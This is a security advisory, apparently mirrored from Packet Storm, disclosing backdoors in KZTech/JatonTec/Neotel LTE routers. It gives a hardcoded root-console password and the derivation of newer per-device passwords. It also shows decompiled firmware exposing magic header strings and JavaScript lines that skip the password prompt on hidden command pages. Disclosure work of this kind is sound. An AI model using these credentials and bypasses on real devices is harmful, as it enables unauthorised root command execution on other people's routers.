Share 
## https://sploitus.com/exploit?id=PACKETSTORM:161885
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Remote Code Execution (Backdoors)  
  
  
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.  
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk  
http://www.jatontec.com/products/show.php?itemid=258  
http://www.jatontech.com/CAT12.html#_pp=105_564  
http://www.kzbtech.com/AM3300V.html  
https://neotel.mk/ostanati-paketi-2/  
  
Affected version: Model | Firmware  
-------|---------  
JT3500V | 2.0.1B1064  
JT3300V | 2.0.1B1047  
AM6200M | 2.0.0B3210  
AM6000N | 2.0.0B3042  
AM5000W | 2.0.0B3037  
AM4200M | 2.0.0B2996  
AM4100V | 2.0.0B2988  
AM3500MW | 2.0.0B1092  
AM3410V | 2.0.0B1085  
AM3300V | 2.0.0B1060  
AM3100E | 2.0.0B981  
AM3100V | 2.0.0B946  
AM3000M | 2.0.0B21  
KZ7621U | 2.0.0B14  
KZ3220M | 2.0.0B04  
KZ3120R | 2.0.0B01  
  
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi  
& VoIP CPE product specially designed to enable quick and easy  
LTE fixed data service deployment for residential and SOHO customers.  
It provides high speed LAN, Wi-Fi and VoIP integrated services  
to end users who need both bandwidth and multi-media data service  
in residential homes or enterprises. The device has 2 Gigabit LAN  
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and  
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing  
and firewall software for security. It provides an effective  
all-in-one solution to SOHO or residential customers. It can  
deliver up to 1Gbps max data throughput which can be very  
competitive to wired broadband access service.  
  
Desc: The device has several backdoors and hidden pages that  
allow remote code execution, overwriting of the bootrom and  
enabling debug mode.  
  
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN  
Linux 2.6.36+ (mips)  
Mediatek APSoC SDK v4.3.1.0  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2021-5639  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5639.php  
  
  
03.02.2021  
  
--  
  
  
Older and newer models defer in backdoor code.  
By navigating to /syscmd.html or /syscmd.asp pages  
an attacker can authenticate and execute system  
commands with highest privileges.  
  
Old models (syscmd.asp) password: super1234  
  
Newer models (syscmd.html) password: md5(WAN_MAC+version):  
  
$ curl -k https://192.168.1.1/goform/getImgVersionInfo  
{"currentImg":["1", "Y", "V2.0.0B3210"], "shadowImg":["0", "Y", "V2.0.0B04"]}  
  
...  
pcVar6 = (char *)nvram_bufget(1,"WAN_MAC_ADDR");  
if (*pcVar6 == 0) {  
pcVar6 = "6C:AD:EF:00:00:01";  
}  
memset(acStack280,0,0x100);  
sprintf(acStack280,"generate debug password : %s %s",pcVar6,"V2.0.0B3210");  
...  
psMd5Init(auStack112);  
psMd5Update(auStack112,local_10,local_c);  
psMd5Final(auStack112,uParm1);  
return;  
...  
  
  
Another 2 backdoors exist using the websCheckCookie() and specific header strings.  
  
...  
iVar2 = strncmp(acStack2268,"UPGRADE:927",0xb);  
if (iVar2 != 0) {  
return 0xffffffff;  
}  
if ((*(char **)(iParm1 + 0xdc) != (char *)0x0) &&  
(iVar2 = strncmp(*(char **)(iParm1 + 0xdc),"TONY@KZT",8), iVar2 != 0)) {  
return 0xffffffff;  
...  
if (iVar1 != 0) goto LAB_0047c304;  
LAB_0047c32c:  
WebsDbgLog(2,"[%s] UserAgent=%s, username=%s,command=%s","startSysCmd",__s1_00,__s1_01,__s1);  
LAB_0047c35c:  
__n = strlen(__s1);  
if (__n == 0) {  
snprintf(acStack1560,0x200,"cat /dev/null > %s","/var/system_command.log");  
WebsDbgLog(3,"[%s] %s","startSysCmd",acStack1560);  
system(acStack1560);  
websWrite(iParm1,"invalid command!");  
goto LAB_0047c3f8;  
}  
...  
  
  
Bypass the backdoor password request and enable debug mode from within the web console:  
  
$('#div_check').modal('hide'); <--- syscmd.html  
  
g_password_check_alert.close(); <--- syscmd.asp